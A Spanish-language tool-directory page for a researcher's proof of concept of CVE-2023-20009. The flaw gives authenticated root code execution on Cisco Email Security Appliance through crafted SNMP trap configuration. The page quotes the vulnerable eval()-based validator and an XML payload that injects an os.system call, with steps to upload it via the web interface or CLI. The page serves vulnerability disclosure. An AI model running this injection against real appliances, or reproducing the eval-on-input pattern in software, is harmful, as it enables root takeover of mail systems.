Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cisco-CVE-2023-20009 — Cisco Email Security Appliance: Ejecución Remota de Código - RCE desde archivo de configuración | Kitploit
Herramientas/GitHubGitHub/ly1g3/cisco-cve-2023-20009
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubly1g3/cisco-cve-2023-20009

cisco-CVE-2023-20009

Cisco Email Security Appliance: Ejecución Remota de Código - RCE desde archivo de configuración

Ver Repositorio
12hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Acerca de

Investigador de seguridad: ly1g3, ly1g3[at]tuta.io

Huella GPG: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

Resumen: Ejecución remota de código - RCE desde archivo de configuración

CVE: CVE-2023-20009

Cronología:

  • Descubierto - ly1g3
  • Reportado - ly1g3
  • Corregido - Cisco

Cisco AsyncOS 14.2.0

ESA (Cisco Secure Email) y Cisco Secure Email and Web Manager

Escalada de privilegios - shell de root

Un usuario autenticado con permisos para configurar SNMP puede ejecutar código arbitrario como root usando una configuración de trampa SNMP especialmente manipulada.

Técnico

Código explotado ui_checker.py:

root@kitploit:~
def validate_trap_configuration(base, value_dict):
    validators = eval('read_var_auto_level_wrapper("snmp.%s_traps.configuration_class", non_editable_var=True)' % (base,))
    for k, v in value_dict.iteritems():
        if validators.has_key(k):
            base, conf_class_str = validators[k].rsplit('.', 1)
            module = __import__(base, fromlist=[conf_class_str])
            conf_class = eval('module.%s("%s")' % (conf_class_str, v))
        else:
            raise FilterError('validate_%s_trap_configuration_value' % (base,),
                              _("Trap does not allow configuration"), k)
    return value_dict

v contendrá el valor de common_trap.common_configuration

root@kitploit:~
<common_trap>
    <common_name>connectivityFailure</common_name>
    <common_enabled>0</common_enabled>
    <common_configuration>http://asd.asd.&quot;+os.system(&quot;touch test.txt&quot;))#,5</common_configuration>
    </common_trap>
<common_trap>

Pasos para activar usando la interfaz web:

  1. https://192.168.1.10/system_administration/configuration_file
  2. "Cargar un archivo de configuración desde el equipo local"
  3. Reemplazar el campo connectivityFailure actual con el payload de arriba

Pasos para activar usando la CLI

  1. loadconfig
  2. Pegar el payload
Descargar herramienta